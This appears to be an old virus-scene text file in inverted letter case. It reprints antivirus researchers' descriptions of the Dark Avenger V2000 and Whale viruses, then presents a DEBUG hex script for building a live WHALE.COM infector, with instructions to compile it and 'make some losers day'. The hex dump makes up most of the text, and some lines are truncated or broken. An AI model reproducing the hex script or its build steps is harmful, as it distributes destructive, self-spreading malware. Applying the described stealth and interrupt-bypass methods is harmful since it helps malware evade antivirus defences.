tHIS VIRUS IS ALSO "MADE IN bULGARIA" AND AGAIN i AM INDIRECTLY THE

CAUSE OF ITS CREATION.  i AM A WELL KNOWN "VIRUS-BUSTER" IN bULGARIA

AND MY ANTIVIRUS PROGRAMS ARE VERY WIDELY USED.  oF COURSE, VIRUS

DESIGNERS DIDN'T LIKE IT.  sO THEIR NEXT CREATION...  CAUSES TROUBLE

TO MY ANTIVIRUS PROGRAMS.


tHIS VIRUS IS EXACTLY 2000 BYTES LONG AND i THINK THAT IT WAS

CREATED BY THE AUTHOR OF THE eDDIE (dARK aVENGER) VIRUS.  tHE

PROGRAMMING STYLE IS THE SAME AND THERE ARE EVEN PIECES OF CODE

WHICH ARE THE SAME.


tHE VIRUS ACTS MUCH LIKE THE eDDIE ONE --- IT INSTALLS RESIDENT IN

MEMORY BY MANIPULATING THE MEMORY CONTROL BLOCKS; INFECTS

command.com AT THE FIRST RUN; INFECTS BOTH .com- AND .exe-FILES;

INFECTS FILES WHEN ONE EXECUTES THEM AS WELL AS WHEN ONE COPIES THEM.


hOWEVER, THERE ARE SOME EXTRAS ADDED.  fIRST, THE VIRUS IS ABLE TO

FETCH THE ORIGINAL int 13H VECTOR JUST LIKE THE v512 ONE (BY USING

THE SAME UNDOCUMENTED FUNCTION --- TRICKS SPREAD FAST BETWEEN VIRUS

PROGRAMMERS).


sECOND, IT INTERCEPTS THE FIND-FIRST (fcb) AND FIND-NEXT (fcb)

        FUNCTIONS --- JUST LIKE v651 (AKA eddie ii) (AND CONTAINS THE SAME

        BUGS), SO YOU WON'T SEE THE INCREASED FILE LENGTHS IN THE LISTING

        DISPLAYED BY THE dir COMMAND.


tHIRD, IT CONTAINS THE STRING "cOPYRIGHT (c) 1989 BY vESSELIN

       bONTCHEV", SO PEOPLE MAY THINK THAT i AM THE AUTHOR OF THIS VIRUS.

       iN FACT, THE VIRUS SEARCHES EVERY PROGRAM BEING EXECUTED FOR THIS

       STRING (THE CASE OF THE LETTERS DOES NOT MATTER) AND IF FOUND,

       HANGS THE SYSTEM.  iT IS NOT NECESSARY TO TELL YOU THAT ALL MY

       ANTIVIRUS PROGRAMS CONTAIN THIS STRING.  oF COURSE, NOW i WILL HAVE

       TO USE SOME KIND OF ENCRYPTION, JUST TO PREVENT SUCH TRICKS.


       vESSELIN bONTCHEV REPORTED IN mAY 1990:


       tHE v2000 VIRUS (dark avenger 2000)

       ===================================


       - iT TURNED OUT THAT THE EXAMPLE OF THIS VIRUS i SENT TO SOME OF

       THE ANTIVIRUS RESEARCHERS WAS NOT THE ORIGINAL VERSION.  tHE

       ORIGINAL CONTAINS THE STRING "oNLY THE gOOD DIE YOUNG..."

       INSTEAD OF THE "cOPY ME - i WANT TO TRAVEL" MESSAGE.  aLSO A

       SMALL PIECE OF CODE IN THE ORIGINAL VERSION WAS PATCHED TO

       CONTAIN THE "666" STRING. (tHAT IS, THE VERSION YOU HAVE CONTAINS

       THIS STRING, THE ORIGINAL DOES NOT.)


       - tHERE EXISTS ALSO A SMALL MUTATION OF THE VERSION YOU HAVE.

       tHE ONLY DIFFERENCE IS THAT THE c' CHARACTER IN THE WORD "cOPY"

       WAS CHANGED TO z'.

-
       wHEN DESCRIBING THE v2000 VIRUS, i STATED THAT IT HALTS THE

       COMPUTER IF YOU RUN A PROGRAM WHICH CONTAINS THE STRING

       "cOPYRIGHT (C)1989 BY vESSELIN bONTCHEV". tHIS IS NOT QUITE

       CORRECT. iN FACT, THE PROGRAMS ARE ONLY CHECKED FOR THE "vESSELIN

       bONTCHEV" PART OF THE STRING.


       - i OBTAINED jOHN mCaFEE'S PROGRAM cLEAN, VERSION 60.  iN THE

       ACCOMPANYING DOCUMENTATION HE STATES ABOUT THE v2000 VIRUS THAT

       "tHE VIRUS IS VERY VIRULENT AND HAS CAUSED SYSTEM CRASHES AND

       LOST DATA, AS WELL AS CAUSING SOME SYSTEMS TO BECOME NON-BOOTABLE

       AFTER INFECTION".  tHIS IS NOT VERY CORRECT, OR AT LEAST, THERE

       IS MUCH MORE TO BE SAID.  tHE VIRUS IS EXACTLY AS VIRULENT AS THE

       dARK aVENGER VIRUS, AND FOR THE SAME REASON.  iT INFECTS FILES

       NOT ONLY WHEN ONE EXECUTES THEM, BUT ALSO WHEN ONE READS OR

       COPIES THEM. tHIS IS ACHIEVED EXACTLY IN THE SAME MANNER AS IN

       THE dARK aVENGER.  tHE SYSTEMS BECOME NON-BOOTABLE WHEN THE VIRUS

       INFECTS THE TWO HIDDEN FILES OF THE OPERATING SYSTEM - IT CANNOT

       DISTINGUISH THEM FROM THE REGULAR .com FILES.  bY THE WAY, THE

       dARK aVENGER VIRUS OFTEN CAUSES THE SAME EFFECT.  aND AT LAST,

       BUT NOT LEAST (:-)), THE VIRUS IS HIGHLY DESTRUCTIVE - JUST AS

       THE dARK aVENGER IS.  iT DESTROYS THE INFORMATION ON A RANDOMLY

       SELECTED SECTOR ON THE DISK ONCE IN EVERY 16 RUNS OF AN INFECTED

       PROGRAM. tHE RANDOM FUNCTION IS EXACTLY THE SAME, AND THE

       COUNTERS (0 TO 15 AND FOR THE LAST ATTACKED SECTOR) ARE EXACTLY

       THE SAME AND ON THE SAME OFFSETS IN THE BOOT SECTOR AS WITH THE

       dARK aVENGER VIRUS.  tHE MAIN DIFFERENCE IS THAT THE DESTROYED

       SECTOR IS OVERWRITTEN NOT WITH A PART OF THE VIRUS BODY, BUT WITH

       THE BOOT SECTOR INSTEAD.  tHIS MAKES A BIT MORE DIFFICULT TO

       DISCOVER WHICH FILES ARE DESTROYED - THE BOOT SECTOR IS CONTAINED

       IN MANY "GOOD" PROGRAMS, SUCH AS format, sys, ndd.  aLSO, THE

       NASTIEST THING - THE DAMAGE FUNCTION IS NOT PERFORMED VIA int 26H

       (WHICH CAN BE INTERCEPTED).  tHE VIRUS DETERMINES THE ADDRESS OF

       THE DEVICE DRIVER FOR THE RESPECTIVE DISK UNIT (USING AN

       UNDOCUMENTED dos FUNCTION CALL, OF COURSE.  i BEGIN TO WONDER IF

       rALF bROWN DID ANY GOOD WHEN HE MADE THE INFORMATION IN THE

       interXYY FILE AVAILABLE :-)).  tHEN IT PERFORMS A DIRECT CALL TO

       THAT ADDRESS.  tHE DEVICE DRIVER IN dos DOES ITS WORK AND ISSUES

       THE APPROPRIATE int 13H.  hOWEVER THE VIRUS HAS SCANNED THE

       CONTROLLERS' rom SPACE AND HAS DETERMINED THE ORIGINAL ADDRESS OF

       THE INTERRUPT HANDLER - JUST AS THE dARK aVENGER VIRUS DOES.

       tHEN IT HAS TEMPORARY REPLACED THE int 13H VECTOR WITH THE

       A

       CANNOT BE INTERCEPTED.


       - aLSO THIS VIRUS (UNLIKE dARK aVENGER) SUPPORTS pc-dos VERSION

       4.0 AND WILL WORK (AND INFECT) UNDER IT.

       
- tHE BYTES 84 a8 a0 ad a0 20 8f 2e IN THE VIRUS BODY ARE THE

       NAME "dIANA p.", THIS TIME WRITTEN IN CYRILLICS.



        uNKNOWN sOURCE


        40hEX vOLUME 1 iSSUE 20006



        tHE wHALE vIRUS



       oH YES HERE IT IS, THE BIGGEST AND MEANEST VIRUS AROUND.  fIRST

       BEFORE YOU GO AND COMPILE IT READ WHAT pATTI THINKS OF IT.



     aLIASES:     mOTHER fISH, sTEALTH vIRUS, z tHE wHALE
 v
     sTATUS:    rESEARCH

     dISCOVERED:  aUGUST, 1990

     sYMPTOMS:   .com & .exe GROWTH; DECREASE IN AVAILABLE MEMORY;

                  SYSTEM SLOWDOWN; VIDEO FLICKER; SLOW SCREEN WRITES;

                  FILE ALLOCATION ERRORS; SIMULATED SYSTEM REBOOT

    ORIGIN:      hAMBURG, wEST gERMANY

    eFF lENGTH:  9,216 bYTES

    tYPE cODE:   prHa - pARASITIC rESIDENT .com & .exe iNFECTOR

    dETECTION mETHOD: vIRUsCAN v67+, pRO-sCAN 2.01+, nav, ibm sCAN 2.00+

    rEMOVAL iNSTRUCTIONS:  sCAN/d, cLEANuP v67+, pRO-sCAN 2.01+,

                           OR dELETE INFECTED FILES

   gENERAL cOMMENTS:
   tHE wHALE vIRUS WAS SUBMITTED IN EARLY sEPTEMBER, 1990. tHIS VIRUS

   HAD BEEN RUMORED TO EXIST SINCE THE ISOLATION OF THE fISH 6 vIRUS IN

   jUNE, 1990.  iT HAS BEEN REFERRED TO BY SEVERAL NAMES BESIDES wHALE,

   INCLUDING mOTHER fISH AND z tHE wHALE.  tHE ORIGIN OF THIS VIRUS IS

   SUBJECT TO SOME SPECULATION, THOUGH IT IS PROBABLY FROM hAMBURG,

   wEST gERMANY DUE TO A REFERENCE WITHIN THE VIRAL CODE ONCE IT IS DECRYPTED.


   tHE FIRST TIME A PROGRAM INFECTED WITH THE wHALE vIRUS IS EXECUTED,

   THE wHALE WILL INSTALL ITSELF MEMORY RESIDENT IN HIGH SYSTEM MEMORY

   BUT BELOW THE 640k dos BOUNDARY.  oN THE AUTHOR'S xt CLONE, THE

   VIRUS ALWAYS STARTS AT ADDRESS 9d90.  aVAILABLE FREE MEMORY WILL

   BE DECREASED BY 9,984 BYTES.  mOST UTILITIES WHICH DISPLAY MEMORY

   USAGE WILL ALSO INDICATE A VALUE FOR TOTAL SYSTEM MEMORY WHICH IS

   9,984 BYTES LESS THAN WHAT IS ACTUALLY INSTALLED.


   tHE FOLLOWING TEXT STRING CAN BE FOUND IN MEMORY ON SYSTEMS

   INFECTED WITH THE wHALE VIRUS:  "z the whale".


   iMMEDIATELY UPON BECOMING MEMORY RESIDENT, THE SYSTEM USER WILL

   EXPERIENCE THE SYSTEM SLOWING DOWN.  nOTICEABLE EFFECTS OF THE

   SYSTEM SLOWDOWN INCLUDE VIDEO FLICKER TO EXTREMELY SLOW SCREEN

   WRITES.  sOME PROGRAMS MAY APPEAR TO "HANG", THOUGH THEY WILL

   EVENTUALLY EXECUTE PROPERLY IN MOST CASES SINCE THE "HANG" IS DUE

   TO THE SLOWING OF THE SYSTEM.


   wHEN A PROGRAM IS EXECUTED WITH THE wHALE MEMORY RESIDENT, THE VIRUS

   WILL INFECT THE PROGRAM.  iNFECTED PROGRAMS INCREASE IN LENGTH, THE

   ACTUAL CHANGE IN LENGTH IS USUALLY 9,216 BYTES.  nOTE THE "USUALLY":

   THIS VIRUS DOES OCCASIONALLY INFECT A PROGRAM WITH A "MUTANT" WHICH

   WILL BE A DIFFERENT LENGTH.  iF THE FILE LENGTH INCREASE IS EXACTLY

   9,216 BYTES, THE wHALE WILL HIDE THE CHANGE IN FILE LENGTH WHEN A

   DISK DIRECTORY COMMAND IS EXECUTED.  iF THE FILE LENGTH OF THE VIRAL

   CODE ADDED TO THE PROGRAM IS OTHER THAN 9,216 BYTES, THE FILE LENGTH

   DISPLAYED WITH THE DIRECTORY COMMAND WILL EITHER THE ACTUAL INFECTED

   FILE LENGTH, OR THE ACTUAL INFECTED FILE LENGTH MINUS 9,216 BYTES.


   eXECUTING THE dos chkdsk PROGRAM ON INFECTED SYSTEMS WILL RESULT IN

   FILE ALLOCATION ERRORS BEING REPORTED.  iF chkdsk /f IS EXECUTED,

   FILE DAMAGE WILL RESULT.


   tHE wHALE ALSO ALTERS THE PROGRAM'S DATE/TIME IN THE DIRECTORY WHEN

   THE FILE IS EXECUTED, THOUGH IT IS NOT SET TO THE SYSTEM DATE/TIME

   OF INFECTION.  oCCASIONALLY, wHALE WILL ALTER THE DIRECTORY ENTRY

   FOR THE PROGRAM IT IS INFECTING IMPROPERLY, RESULTING IN THE DIRECTORY

   ENTRY BECOMING INVALID.  tHESE PROGRAMS WITH INVALID DIRECTORY

   ENTRIES WILL APPEAR WHEN THE DIRECTORY IS LISTED, BUT SOME DISK

   UTILITIES WILL NOT ALLOW ACCESS TO THE PROGRAM.  iN THESE CASES, THE

   DIRECTORY ENTRY CAN BE FIXED WITH nORTON uTILITIES fd COMMAND TO

   RESET THE FILE DATE.


   THE wHALE OCCASIONALLY WILL CHANGE ITS BEHAVIOR WHILE IT IS MEMORY

   RESIDENT.  wHILE MOST OF THE TIME IT ONLY INFECTS FILES WHEN

   EXECUTED, THERE ARE PERIODS OF TIME WHEN IT WILL INFECT ANY FILE

   OPENED FOR ANY REASON.  iT WILL ALSO, AT TIMES, DISINFECT FILES

   WHEN THEY ARE COPIED WITH THE dos COPY COMMAND, AT OTHER TIMES IT

   WILL NOT "DISINFECT ON THE FLY".


   oCCASIONALLY, THE wHALE vIRUS WILL SIMULATE WHAT APPEARS TO BE A

   SYSTEM REBOOT.  wHILE THIS DOESN'T ALWAYS OCCUR, WHEN IT DOES OCCUR

   THE bREAK KEY IS DISABLED SO THAT THE USER CANNOT EXIT UNEXPECTEDLY

   FROM THE EXECUTION OF THE SYSTEM'S aUTOeXEC.bAT FILE.  iF THE

   aUTOeXEC.bAT FILE CONTAINED ANY SOFTWARE WHICH DOES FILE OPENS UP

   OTHER EXECUTABLE PROGRAMS, THOSE OPENED EXECUTABLE PROGRAMS WILL

   BE INFECTED AT THAT TIME IF THEY WERE NOT PREVIOUSLY INFECTED.

   tYPICALLY, FILES INFECTED IN THIS MANNER WILL INCREASE BY 9,216

   BYTES THOUGH IT WILL NOT BE SHOWN IN A DIRECTORY LISTING.


   a HIDDEN FILE MAY BE FOUND IN THE ROOT DIRECTORY OF DRIVE c: ON

   INFECTED FILES.  tHIS FILE IS NOT ALWAYS PRESENT, THE VIRUS WILL

   SOMETIMES REMOVE IT, ONLY TO RECREATE IT AGAIN AT A LATER TIME.

   tHE NAME OF THIS HIDDEN FILE IS fish-#9.tbl, IT CONTAINS AN

   IMAGE OF THE HARD DISK'S PARTITION TABLE ALONG WITH THE FOLLOWING

   MESSAGE: "fISH vIRUS #9  a wHALE IS NO fISH!  mIND HER mUTANT fISH
             AND THE HIDDEN fISH eGGS  FOR THEY ARE DAMAGING.
             tHE SIXTH fISH MUTATES ONLY IF THE wHALE IS IN  HER cAVE."
     aFTER THE DISCOVERY OF THIS HIDDEN FILE, THE AUTHOR OF THIS

     DOCUMENT MADE SEVERAL ATTEMPT TO HAVE THE fISH 6 vIRUS MUTATE

     BY INTRODUCING IT AND wHALE INTO A SYSTEM.  uNDER NO CIRCUMSTANCES

     DID A MUTATION OF EITHER VIRUS RESULT, THE RESULTANT FILES WERE

     INFECTED WITH BOTH AN IDENTIFIABLE fISH 6 INFECTION AND A wHALE

     INFECTION.


     wHALE IS HOSTILE TO DEBUGGERS AND CONTAINS MANY TRAPS TO PREVENT

     SUCCESSFUL DECRYPTION OF THE VIRUS.  oNE OF ITS "TRAPS" IS TO LOCK

     OUT THE KEYBOARD IF IT DETERMINES A DEBUGGER IS IN USE.

 

     hERE'S A SIDE NOTE BY THE AUTHOR OF f-pROT



   wHALE tHIS IS A RECENT, RATHER REMARKABLE VIRUS.  iT IS LONG, 9216 BYTES AND

   ABLE TO INFECT com AND exe FILES.  tHE INCREASE IN FILE SIZE IS NOT

   VISIBLE THOUGH, WHILE THE VIRUS IS ACTIVE IN MEMORY, AS IT USES SEVERAL

   ADVANCED "STEALTH" METHODS.  oTHER EFFECTS OF THE VIRUS ARE NOT KNOWN,

   BUT ONE INFECTED PROGRAM DISPLAYED THE FOLLOWING MESSAGE WHEN RUN:


                the whale in search of the 8 fish

                i am 'KNZYVO' in hamburg ADDR ERROR d9eb,02


    mOST OF THE VIRUS IS DEVOTED TO ENCRYPTION AND CODE WHICH MOVES BLOCKS OF

    VIRUS CODE AROUND.  tHIS OVERHEAD RESULTS IN A CONSIDERABLE SLOWDOWN OF

    INFECTED SYSTEMS.



    aND HERE IT IS.  uSE YOUR EDITOR TO COPY THE BELOW MACHINE LANGUAGE

    SCRIPT TO A FILE CALLED whale.scr  nEXT USE debug TO MAKE IT INTO A

    com FILE.  uSE THE COMMAND  debug < whale.scr   wHEN IT GETS DONE

    YOU'LL SEE A FILE CALLED whale.com.  tHERE IT IS, HAVE FUN - AND

    MAKE SOME LOSERS DAY!


    ------------------------------------------------------------------------------


    N WHALE.COM

    E 0100  e9 c9 23 01 f5 21 e1 02 c0 00 d2 07 ff ff 99 14

    E 0110  00 e9 b8 23 cd 20 8d 01 bd 00 e1 02 c0 00 d2 07

    E 0120  ff ff 99 14 fe ff e3 8f 01 00 99 14 1e 00 00 00

    E 0130  26 fb 5a 26 47 48 63 33 57 6e 52 4c 63 3d ff 10

    E 0140  d4 06 75 ec 06 7e 17 75 25 fa 03 24 3d 8b 21 90

    E 0150  c3 24 67 2a 08 12 07 c4 e0 5b 08 9c 06 e1 15 66

    E 0160  03 7b 25 7d d4 06 4e 36 9c 08 90 c3 24 d4 06 4c

    E 0170  36 ff 38 d4 06 4a 36 35 02 40 c7 20 7d 25 e5 13

    E 0180  c7 20 48 25 26 34 c3 77 3d 8b 29 3d 8b 38 48 81

    E 0190  e5 5c 01 ba 1d 53 af cd cf cf 22 02 d9 a7 29 27

    E 01a0  4a 2e d9 14 2e 05 24 5f d5 b7 eb 38 1d 1f ce bf

    E 01b0  ff cc 4b bb 11 1b 81 11 06 ef a5 d0 02 a7 24 68

    E 01c0  63 ad 0a 07 0c e8 a2 14 e8 5e 1a 38 38 e5 68 30

    E 01d0  23 bd db 29 aa 6a 23 92 26 48 3a f5 2c 38 b3 4a

    E 01e0  e0 16 ae 59 1c 03 01 88 2c f6 f5 0e 92 3e 22 3a

    E 01f0  b1 13 33 1c b7 d8 19 bd 1f fe 0b 4e 1c 0d f6 53

    E 0200  0e f6 bd 2d 27 ce 28 09 1c d3 5c be de c0 e7 83

    E 0210  5d 7a 67 a1 19 cd ed c2 4f 98 c3 2c 3e b6 4e 04

    E 0220  d8 fe e4 6a d5 f7 c2 15 c6 ad f7 2a 21 d5 8c c2

    E 0230  85 e2 6f ed f5 c2 5f ce a8 f7 28 b6 d3 28 29 d1

    E 0240  28 a0 f3 fb ce 9a 1e ce ea 08 14 69 29 5a d9 73

    E 0250  b4 0f 79 72 e5 7c d9 4c 54 d5 77 f9 79 47 bc 5a

    E 0260  19 5f b6 47 f6 52 1a 5f 72 ae 7c 2d 4c 09 7e 81

    E 0270  2f 7d 6e 21 72 af 7c db 4c 7a b4 65 5a 6f d0 e9

    E 0280  01 09 ea a7 fd 73 27 fa 8b 23 9a f3 ce fb b3 2e

    E 0290  3d c4 52 f8 2c c0 d4 48 21 f9 fd fc 90 e0 91 cb

    E 02a0  2c 69 c9 ea 6c c9 eb c6 f9 3b d4 fa e0 b8 67 d7

    E 02b0  0a 6e c6 d1 0c 4a 39 11 c2 97 d3 c6 0a 1d db cd

    E 02c0  d0 e8 59 1b 39 5e 83 3e 5c 45 f4 50 25 5c b6 55

    E 02d0  7a 50 74 66 59 83 17 a1 ad 7e d2 4e 78 b6 cd 7f

    E 02e0  ff 2e 5c d0 ab 5e 9b 7d 72 5e e5 a0 5b 7b 78 70

    E 02f0  6a 7e 44 6b 56 de 55 58 5e 6b 83 b6 e0 67 64 66

    E 0300  2d ce 2c 08 01 e3 de 77 e7 f0 75 e3 f1 f8 42 f6

    E 0310  d6 40 f2 d7 cd 51 de 

    E 0320  d0 30 28 27 a0 f8 42 13 f2 0b ad c9 cb cb ce 01

    E 0330  08 31 25 18 11 23 24 10 0b 97 f3 01 18 9b 03 22

    E 0340  10 0b b8 06 37 36 f8 65 29 08 3d ff 08 0b 00 76

    E 0350  ab 00 26 9d d8 7e 98 1e e1 15 89 38 1f 00 aa 1d

    E 0360  0e 26 fb 55 15 c8 89 c3 9d db a7 75 06 d9 ed a3

    E 0370  22 13 8c 28 1d 00 af 25 0c 26 fb 5b 24 fa f2 28

    E 0380  ad bb 8d f8 ef 89 a8 ef 8d b8 bf 99 fc ab cd b8

    E 0390  ab 99 f8 ef cd b8 ab dd b8 eb 99 a8 bf 8d f8 2e

    E 03a0  a6 1c ab c4 ea e8 f6 0d 51 a0 99 62 44 f8 a7 c8

    E 03b0  b9 d9 54 71 95 a7 28 e3 ad ec 60 47 b0 e1 96 71

    E 03c0  95 b7 21 da df 71 32 cd 99 8a ce 6f cb 92 10 8b

    E 03d0  fe fa e8 26 13 5b a5 f8 72 75 9c 06 22 13 0e a9

    E 03e0  15 06 26 1d 58 2b 55 f3 76 8e d7 ac eb 01 ed fa

    E 03f0  bf 3a 98 07 ad 0b 33 e6 9d d8 cd fb 45 21 30 b8

    E 0400  cd 20 64 a8 20 e7 98 85 31 80 18 9c c5 fe 31 7b

    E 0410  43 8b 98 43 cd 9f 43 4e 9e 43 03 9e 43 a5 9f 43

    E 0420  df 80 8f e8 3b 14 5a cb 16 fc ca d0 2a cd 66 c8

    E 0430  b0 fd 56 fe fd 54 c4 fe c3 f3 d9 99 fe 7d 2e c8

    E 0440  1c 1b 22 c8 ed c4 67 eb da 0a e9 d9 0a e9 df 1e

    E 0450  eb ea 34 eb e8 31 e5 ec 36 eb f6 68 e4 f5 1a e4

    E 0460  f4 a0 f3 89 5c f0 80 b3 e7 85 8e f2 84 8e f2 9c

    E 0470  f1 f0 88 d0 12 fc d0 62 cd 66 c8 23 c2 ed 23 f6

    E 0480  f3 90 3d ff 00 8b 25 70 fa 90 3b fa 65 3b 50 41

    E 0490  17 1c 39 29 64 e8 8d 15 1b 7a a7 b2 7a a7 33 7a

    E 04a0  a7 68 7a c6 b9 54 b0 6a c9 6b d3 3c 49 01 92 9a

    E 04b0  59 92 9a 41 66 dc d7 1a ec 75 ce 95 06 34 6d 50

    E 04c0  d7 6b 94 7c 6a 61 07 33 24 01 36 26 c5 85 c7 45

    E 04d0  7e 2e d9 35 ea 02 e5 e8 4f 15 28 44 5f eb 62 26

    E 04e0  47 6a fd 74 1d 54 6c 53 5f e9 62 2a 47 6a 99 ab

    E 04f0  bb 5f ec 52 28 47 6a f8 44 1f 54 4c cf 57 35 61

    E 0500  99 e4 59 58 c3 98 bc 34 28 48 53 7c 41 8f 20 fb

    E 0510  31 20 0f 26 be 7e 02 2e f1 18 35 11 28 1f c9 9f

    E 0520  05 35 8a 26 b3 23 88 71 d9 47 d7 d0 e8 6f 3b 1d

    E 0530  d0 33 e7 50 26 2f 14 e2 de 98 d9 ce fb 04 20 01

    E 0540  45 4d d9 43 89 72 d9 33 05 14 31 00 12 7d 50 ad

    E 0550  54 4b 56 08 ec 26 cc 37 e8 ce 16 0e b2 37 95 bc

    E 0560  98 2e 74 a6 7c b7 87 7c ad 9a 9b e5 fb d4 23 0a

    E 0570  58 78 18 6b a5 c5 9b f4 93 89 9d 9a bb 58 c2 4f

    E 0580  58 c7 07 7c 10 5f 96 4b 45 64 d0 e8 93 16 28 97

    E 0590  8c 38 b1 f5 94 b9 2e a7 ce 87 bf 80 8c 3a b1 f9

    E 05a0  94 b9 4a 26 68 8c 3f 81 fb 94 b9 2b 97 cc 87 9f

    E 05b0  1c 84 e6 b2 4a 63 8b 8b c3 ce 94 05 3f 73 7e 10

    E 05c0  40 96 c8 ad 52 a2 f8 90 97 95 b1 a0 f8 7c c8 37

    E 05d0  62 18 6c 88 f5 6f 7a e5 4b 83 60 1b 07 a1 4d 08

    E 05e0  af c9 87 78 11 81 c8 6b 04 af e0 81 e5 fc 04 7b

    E 05f0  3d ff 92 62 09 7e 26 0c 24 3d 88 21 16 0c 24 df

    E 0600  e9 7b 13 eb ce 2f 05 28 27 dc bc d9 1a ed 31 52

    E 0610  37 2d f4 fa 54 28 1d 67 03 cf 6a fe ce 37 05 06

    E 0620  34 cf 19 cb cf 05 31 97 01 b4 18 fe 41 21 8b 73

    E 0630  21 82 f7 20 2f 14 21 f1 10 d1 46 2c a7 e9 7d 3b

    E 0640  20 66 03 cf 4e 01 a6 7c 18 a6 92 7f 3b 13 24 55

    E 0650  10 e9 69 12 81 49 0e 00 02 90 5f 39 13 e9 65 12

    E 0660  e2 22 fa ec 22 f8 43 cf 2b 02 ce c5 04 2d 4b b0

    E 0670  b4 b5 bc 3e 77 18 96 5b 44 72 61 03 cf 33 01 ce

    E 0680  d2 04 06 67 c0 50 d7 75 5c 3c f4 bd 77 fa 91 dc

    E 0690  74 52 d2 74 e3 66 c2 52 d5 f4 ce 49 8b 4c 4a 50

    E 06a0  ba 81 6f 73 60 03 cf e5 00 ce 84 04 d7 00 1d 2a

    E 06b0  b4 48 8c 02 13 8f cb 16 1b ff 05 53 25 60 36 e9

    E 06c0  ca 35 06 0c be d8 a7 75 b9 13 37 ba 13 35 2e ec

    E 06d0  23 66 36 47 03 fa 98 00 fa f5 00 50 0f 5c 55 7c

    E 06e0  53 5b 18 23 2a 1b 54 51 79 00 55 7c 53 5b 15 56

    E 06f0  5a 67 55 40 15 23 2a 15 20 52 15 57 7b 54 6c 76

    E 0700  15 69 60 15 6e 7c 15 46 7a 46 68 32 15 4d 7a 5b

    E 0710  64 33 5d 65 61 15 4d 66 41 61 7d 41 20 55 5c 73

    E 0720  7b 15 61 7d 51 20 67 5d 65 33 5d 69 77 51 65 7d

    E 0730  15 46 7a 46 68 33 70 67 74 46 20 75 5a 72 33 41

    E 0740  68 76 4c 20 72 47 65 33 51 61 7e 54 67 7a 5b 67

    E 0750  3d 15 54 7b 50 20 60 5c 78 67 5d 20 55 5c 73 7b

    E 0760  15 6d 66 41 61 67 50 73 33 5a 6e 7f 4c 20 7a 53

    E 0770  20 44 5d 61 7f 50 20 7a 46 20 7a 5b 20 7b 50 72

    E 0780  33 76 61 65 50 0e 0c 81 40 aa ae 00 a9 ef 05 ec

    E 0790  23 66 36 47 06 a7 0b ff 05 53 25 fb de 1a e1 ce

    E 07a0  0b fd e5 fb 14 db fa ec da fb 97 25 02 0c c2 16

    E 07b0  f1 04 e0 1a 4c 3a e4 a9 e2 06 ea f7 c7 30 0d 75

    E 07c0  c4 9a d3 d0 54 17 a6 67 da a6 7c 17 a6 92 6f 36

    E 07d0  13 24 a6 4c 12 26 f8 cb c5 3d e8 40 10 0c d2 6e

    E 07e0  27 59 90 d5 d9 90 d7 3a 78 ee df 66 1b cd 07 e8

    E 07f0  ce 43 03 2a ca 50 2c 41 9e f3 c0 9e df 22 50 e5

    E 0800  c7 75 23 fb 74 2c 60 4d cf 93 fc cf 50 03 af 45

    E 0810  02 af 5d 04 cd f7 21 2a 11 e6 07 20 db 75 ae 20

    E 0820  26 0c 89 cf fb 00 26 48 53 7c 1d 58 23 03 00 27

    E 0830  d0 33 f5 92 ee ae e8 e8 be e8 e9 e0 16 eb cf b1

    E 0840  06 a1 c0 89 38 17 00 2d da 74 e6 5a e9 75 13 b9

    E 0850  3a 13 53 71 fb e8 cd 11 1e 50 8d 2b ac 8d aa ac

    E 0860  4b 89 46 03 53 d9 2b 8e d9 23 8a 4e 37 9e eb 67

    E 0870  f5 2f 71 77 b8 77 6c 4f 67 7c ce d5 02 3e a5 3d

    E 0880  97 a6 f1 92 f6 3d cf a1 37 63 ed e5 11 56 ff d6

    E 0890  a4 6e cb 4d 45 89 bc 74 7b 90 c4 22 fa 04 d9 01

    E 08a0  eb b7 9a 16 22 13 8b 38 1f 00 c2 12 0b ef 67 10

    E 08b0  1e ca 72 2a 94 da af 05 04 26 22 c2 c4 f1 74 2d

    E 08c0  92 c6 5e 17 e8 2d e8 e9 8e 1a ea cf 90 02 08 d5

    E 08d0  84 6f 19 e8 2d da 74 d5 9a 1e 2a 13 33 f5 9a 16

    E 08e0  22 13 31 f6 b0 0c 26 fa 16 db 92 c6 b6 27 b9 3a

    E 08f0  13 f3 82 20 c9 ce fb 4a 24 5a f8 84 f4 71 08 e5

    E 0900  ff 67 ce f8 61 5e dc 2d 4f 47 6b cf f6 c1 60 ad

    E 0910  cc 60 bd ce ee f7 fa 68 2a de ce 08 21 62 ad cc

    E 0920  62 bd ce c6 04 fd 68 22 de 62 ad fd 62 bd ff 52

    E 0930  e4 de 2c bd d0 ea f8 6a cc 71 24 c5 07 c8 8d dd

    E 0940  36 ad e1 94 fa 5c d8 28 de 52 c6 c3 75 90 c6 33

    E 0950  a8 7d 33 fb f1 d9 90 c6 24 a8 8b 53 fb e8 d9 90

    E 0960  c6 24 a8 81 26 fb df d9 90 c6 2e a8 08 2c fb d6

    E 0970  d9 90 c6 24 a8 2f 16 fb cd d9 90 c6 24 a8 a5 24

    E 0980  fb c4 d9 90 c6 78 a8 7d 33 fb bb d9 90 c6 23 a8

    E 0990  9f 86 fb b2 d9 90 c6 2c a8 a7 26 fb a9 d9 90 c6

    E 09a0  2a a8 2d a1 fb a0 d9 90 c6 24 a8 29 5e fb 97 d9

    E 09b0  90 c6 24 a8 29 64 fb 8e d9 90 c6 24 a8 c0 3c fb

    E 09c0  85 d9 90 c6 4a a8 14 37 fb 7c d9 90 c6 29 a8 00

    E 09d0  26 fb 73 d9 90 c6 2d a8 e3 24 fb 6a d9 48 c3 ce

    E 09e0  72 01 0a ba a7 88 05 1c ab 03 8c 8f 33 7f 7c 1e

    E 09f0  b7 dd b4 b6 3b b5 13 3a 9e 87 70 ac cf aa 0e b9

    E 0a00  a1 45 bf e9 9f 5f 89 76 8d 0f e4 b6 67 c0 b1 a2

    E 0a10  67 70 08 d7 1e e3 37 e8 0f 12 27 26 9f c0 a7 f8

    E 0a20  00 02 0e 00 26 20 d2 08 98 0e e5 37 49 27 d8 15

    E 0a30  26 13 41 d1 e2 89 62 30 92 b5 e4 f1 af 57 21 ce

    E 0a40  54 18 0e fa 5d db fb fa 26 26 52 9c af a8 90 60

    E 0a50  5e 76 a7 73 c4 43 ba 14 ba de bc cd 93 4f 80 26

    E 0a60  6c 6f de 72 d5 77 5a c8 4c e6 64 5c 6b a9 52 74

    E 0a70  1b d1 b6 50 e2 76 a9 a1 8e a9 6c 8e a9 58 6c 77

    E 0a80  c3 e9 fa 06 dc fb e8 9c 13 1a b6 6b 3e 4c 67 b1

    E 0a90  92 7e 76 97 ad 55 a0 11 b5 06 81 78 78 79 78 af

